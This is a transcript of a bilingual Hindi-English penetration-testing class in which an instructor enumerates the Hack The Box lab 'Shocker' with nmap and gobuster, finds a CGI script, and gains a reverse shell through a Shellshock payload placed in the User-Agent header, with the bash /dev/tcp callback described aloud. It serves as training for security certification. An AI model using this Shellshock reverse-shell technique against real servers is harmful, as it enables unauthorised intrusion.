बड़ी क्यों नहीं हो रही स्क्रीन? ऐसे कर देता हूँ। मतलब सब सही जा रहा है, बस एरर इज दिस। नो आई।
Do cd/etc/apt
यू सी डी
/apt/etc/apt
ई टी सी ए पी टी।
enter. Do an ls over here. Font size बढ़ाओ इसको जरा एक बार. Font size is not clear.
नाउ इज इट ओके?
Yeah. So do cat sources dot list.
दिस वन और दिस वन?
Enter करो.
ओके।
Okay. Do cd
या
sources dot list dot d.
सोर्सेज डॉट लिस्ट।
ls.
हाँ ये वाली फाइल है, ये वाली हटानी थी।
Do cat
कैट उसके आगे।
space web tab enter.
या
Okay, remove this one. Remove this file. rm
ओके
web
दिस वन।
tab
या डन।
star
ओके
star
स्पेस स्टार।
asterisk.
या
Yeah, without space.
ओके।
Without space. Yeah. Press enter.
हाँ
You need to put sudo as well before it.
ओके।
Just run sudo bang bang. Yeah.
डेढ़।
Okay.
या
No, ls
रिमूव हो गए।
press type sudo apt update.
हाँ अब ठीक है। वही प्रॉब्लम थी कि लाइक वो फाइल कहाँ सेव हुई है वो मेरे को एग्जैक्टली पता नहीं था। अब पता लग गया है। थैंक यू सर।
So आपने ट्रबल शूट क्या किया था फिर? आप कह रहे थे
डबल।
गूगल किया, आपने गूगल पे क्या
हाँ
ढूंढा?
गूगल पे मैं ढूंढ रहा था कि इस को मैं अब कैसे करूँगा डिलीट, बट एवरी साइट वाज शोइंग मी द कमांड, but they were not showing me that go to this directory then delete from here search where it is। तो ये सब कोई नहीं बता रहा था। they were like just कि कमांड डालो हो जाएगी डिलीट।
अच्छा,
यस सर।
चलो ठीक ठीक है, हो गया ये सॉर्ट.
हाँ ये हो गया, बहुत टाइम से परेशान था इसको लेके।
सो लेट मी क्या?
नहीं वही बता रहा था कि बहुत टाइम से परेशान था इसको लेके, कमांड से नहीं मिल रही थी।
आयुष तुम्हारी आवाज.
हेलो हेलो।
Share my screen with you. Hope it is visible to everyone.
यप।
Hello,
हेलो सर, एम आई ऑडिबल?
guys, can you hear me?
हेलो।
Yes, sir.
Yeah, you are audible. Am I audible?
या screen is currently showing a
Okay,
black screen to me।
great. Yeah, guys, can you hear me now?
Yes, sir.
Yes, sir.
Okay, so everyone is here. Let me just log the meeting for now. Okay, so I'm sharing my screen. Is it visible to everyone?
Yes, sir.
Okay, great. So did you guys practice whatever we covered yesterday?
So वीडियो रेफरेंस नहीं था, बट जहाँ तक याद था आई प्रैक्टिस्ड. जहाँ तक याद था वहाँ तक तो मैंने प्रैक्टिस की थी, बट देन फिर वीडियो रेफरेंस नहीं था. वही था.
ठीक है. So let's start with a new machine today. Okay, so what do we have here? Let's go to hack the box. Let's just confirm if I'm logged in or not. Let's log in over here. So the VPN connection is established now. As you can see here, a new interface is available here. Okay, so let's search for Shocker. Okay, and the machine that we are going to tackle today is Shocker. So let's deploy this machine to our environment, and let's reset it as well. Shocker will be reset in 1 minute. Okay, what I'm going to do is I'm going to document these steps as well. Okay, side by side. So first let's get the IP address 10.10.10.56. Let's do a very basic nmap scan against the target. Let it run. Meanwhile, uh, let's create a new document, new cherry tree document here. Okay, let me mention the target over here. Okay, I have not created the Shocker directory yet. So let's create it. mkdir Shocker. Let's save it here. So let's create a first node over here, telling nmap, or let's say code scan. And in here, let's do TCP. Okay, so let's start from the beginning. Nmap, target IP address, save the output. I do not need to save the output here. Let's do a -p -n -vv, output all formats, nmap directory. Let's put scan1 here. Let this scan run. Meanwhile, our basic nmap scan is completed. Okay, So what we are going to do is we are going to take a snap of it and document this step. The command that I use is this. This is the output over here. This is one way of documenting it. Another way is by taking screenshots of it. So time to time I can take the screenshot of it. Let's take a snap of it. And paste it over here. So I can see something interesting here that says port 80. Port 80 is available here as well. So let's run a version detection scan against it. -scv -capital O, output all formats. Everything is set. Let's run. Root privileges. Let's run it.
IP.
Okay, I forgot to mention the target IP. Huh? Oops. Oopsie doopsie. Yeah, 10, 10, 10, 56. So let's allow these scans to finish. Meanwhile, we can continue with our enumeration. Okay, so I can see Apache server is here, Apache 2418 is running. And I can see on port 2222, OpenSSH 72P2 is running. Okay. The target operating system is Linux. So let's take a note of it. We're targeting a Linux operating system, Apache 2418 server, and port 80 is open. Just taking some key highlights, nothing else. Let's take a note of it.
सर
Yeah.
एक बार स्क्रीनशॉट का दोबारा बता दोगे, लाइक एक पर्टिकुलर कैसे लेते हैं?
So there are variety of ways you can do function plus print screen. That's
Okay.
one way of doing it. Okay. I can do it this way. And it says capture the mouse pointer, select a region. I can do select a region. I can do entire screen, active window. If I do select a region, it is going to select that region and it is going to take a screenshot. Okay. Copy to clipboard, save, open with. This is one way of doing it. There's a shortcut to it, that is Control Shift print screen. Okay.
Okay.
Okay. Let's see. So let's try to explore the port number 80 here.
सर जैसी रिपोर्ट अभी हम बना रहे हैं तो वैसी रिपोर्ट हमें सबमिट करनी होती है?
Not exactly, but along with this thing, you need to elaborate it as well. I'm not elaborating anything here. Okay. I'm just
नहीं
taking a screenshot. But you
ओ
need to fill this. Yeah, go ahead. Speak.
मैं पूछ रहा था कि लाइक ओएसएबी में जो लास्ट के 24 आवर्स रिपोर्ट राइटिंग के होते हैं तो उसमें उसमें भी बिल्कुल एलैबोरेट करके बताना पड़ता है कि हमने ऐसे किया था.
Yes.
ओके, ठीक ठीक, got it.
Trying to enumerate port 80. This first step is try to open it in the browser. Okay. Try to open it in the browser and I can see. Don't bug me. Some sort of image over here. Okay. Nothing in the source code as well. Okay. So what next? What shall I do next? Tell me.
डायरेक्टरी ब्रूट फोर्सिंग
Directory brute forcing. How can I do that?
यूजिंग गोबस्टर.
So you guys know how to install GoBuster?
sudo apt get install gobuster.
Right. So let me just go back to my terminal. I can do sudo apt install GoBuster, but I already have it installed. Okay. So I'm going to run it directly. GoBuster dir -u http target IP target URL -w user share word list dub common.txt. Okay, let's do threads as 25. Okay, so we have our GoBuster output over here. Let me do one thing. Let me save the output of my GoBuster. Sho shocker gobust.txt. Let it run behind the scenes. Meanwhile, I have my output over here. Let's take a note of it. See, what is interesting here is server status and CGI win. But both of them are showing me 403s. Okay. Can anyone tell me what is 403 error?
Restricted
Or
redirection, maybe redirecting.
anyone else would like to try? Redirections are your 300 series errors. You guys don't remember it, huh? 403s are your restricted or forbidden ones. Okay. So let's try to explore this stuff. let's type server status here, forbidden. Okay. First of all, let's save the output over here. Then let's highlight the important ones here. Okay. And then comes your this screenshot that we tried to access the URL here. Server status says forbidden. Let's try CGI bin. And it is saying me 404 not found.
It is
So then
CGI
what is the
dot
variation?
It is CGI dot bin. Okay.
CGI.com.
No, I was just confirming it is CGI dash bin or dot bin.
No, it's dash. Why is it showing me 404 here, but 403 in the GoBuster? Tell me, anyone, you can see both of the outputs are in front of you, one on the left hand side, one on the right hand side. No one. So the difference that you need to observe here is this. Why cannot I draw? Let me see. The difference is here. Can you guys spot the difference?
Slash.
Yes,
It is a directory.
it's a directory. As of now, the server is taking it, considering it as a file. That okay,
File.
404 not found. There is no file named cgi.bin. Okay, and this basically changes the response code. The difference is 404 not found and 403 here. Let's take a screenshot of this as well. Let's add a slash here and press enter. And the response code changes. Okay. It says forbidden. So basically there's a directory CGI bin which is forbidden. CGI, you can search for it. CGI bin. Common Gateway Interface is a resource for accommodating the use of scripts in web design. Okay, so it's a standard directory. A lot of times, not a lot of times, sometimes found in the Apache server. Okay, what does it say? Common Gateway Interface is an interface specification for web server to execute programs like console application running on server that generate web pages dynamically. Such programs are known as CGI scripts. So basically, if this is too complicated for you, let me just simplify it. CGI is generally used for handling the your shell commands, you can say, and sending them over to the web server. Okay, taking some sort of a bash file, taking some sort of bash input, and sending it to the web server. That's what is written here. To execute programs like console application running on server that generates web pages dynamically. Okay. What we can try doing here is, maybe this website is this directory is not allowed to access, but we can try to do a directory brute force inside this directory. Can we do that?
Yes, sir.
So how will I do that?
The Go Buster possible.
GoBuster. Okay. By just adding a slash, you can see the changes. Let's take a note of this as well. Okay. Let's do GoBuster dir -u. Everything should remain same. The only thing should be slash CGI-bin. Okay. And the output should be GoBust underscore CGI bin .txt. Word list needs to remain same. One more flag I want to add. Okay. What I want to do is I want GoBuster to find some other extensions as well. Files having non-standard extensions. Okay. So what I'm going to do is, if you do not know the flags, you can simply do GoBuster dir space -h, and I'm going to use this -x flag. Okay. So let's go here. -x txt sh perl ruby PHP would already been included by default. Let's do no, this much would be fine. Let's press enter.
सर गो बस्टर में नहीं चाहिए होता क्या, लाइक CGI-bin का आगे स्लैश?
क्या? I didn't got you.
सर जैसे हमने देखा कि एरर कोड चेंज हुआ एक स्लैश से,
Yeah.
तो गो बस्टर ऑटोमेटिकली डिटेक्ट कर लेगा कि CGI-bin एक डायरेक्टरी है या एक टेक्स्ट फाइल है?
नहीं.
तो फिर हमने स्लैश भी नहीं लगाया CGI/bin के आगे.
Because when it is going to do brute force, it is automatically going to put a slash and then a word in front of it.
Okay.
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 Yeah. So slash is going to be appended by the GoBuster. And I could have done the same thing by explicitly giving a slash. So at that time, GoBuster is smart enough to not put a slash. Let me just show you. So here you can see that this is also running. Okay. So let's wait for this script to finish. Okay, so the GoBuster is finished running. Okay, and we can go through the output that GoBuster is having for us. 403s, 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 200. User.sh. Interesting. And sh is for
Shell.
Shell.
okay. So let's try to visit it. Giving me some output. Save file. Content type text plain, just an uptime test script. Okay. I can do the same thing using curl as well. Okay. So there is probably some sort of automated script which is running there. Okay. Just give me a quick second, guys. Yeah, guys. So we have some output over here. Okay. So here, what do we understand basically is there is the only hint that we have is the name of the machine, that is Shocker. Okay. And another thing is CGI bin. So we know that okay, CGI bin is vulnerable to shell shock vulnerability. If it is old, let's check it out. Shell shock. Hmm. Not this shell shock. We want to see the shell shock vulnerability. Let's go to images. Yeah. So okay, using HTTP request. So this is basically my shell shock payload. And in this example, I can see that okay, it is being passed in the referrer field of the HTTP header. Okay, let's see shell shock. Let's put POC. Nothing important here. Here I can see that this payload is being passed in the user agent field. Okay, I cannot find any reversal here. Taking control, yes, here I can see, but it is trying to download something. I do not want to use this one. Let's see. Nope, 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 nope. What we want to do is we need to have a shell on the machine, on the target machine. So exploit time. Yeah, this is going to work. This can work. I'm going to come back here, but first let me uh, capture the request in my Bob suite. Okay, so let's run my Bob suite here. Okay, so here I can see a request being made. Okay, let's try to modify this request, send to repeater. And here is the request. Let's try to play around with this request. In the user agent field, I'm going to enter my payload. Okay, let's see. I can try this one, but first modify it. Okay, as per our requirement. Let's do some modifications here. Echo hello echo slash bin slash bash hyphen I dev TCP 10 10 10 sorry 10 10 14 3 I believe. Let me just confirm. 14 7 and let's make it port 9090 only. Okay, let's copy it. Okay, so I just pasted my shell shock payload over here. I modified the payload with my L host and L port. Okay, and I got an shell over here. Let's do who am I? Hmm, I believe the shell is not stable yet. Let's wait for a minute or two.
Hello. Hello. Hello.
Maybe
Maybe.
sir, internet connection broke up.
Yeah, that's how.
Let's wait. You are the host. Can you cancel the recording?
Huh?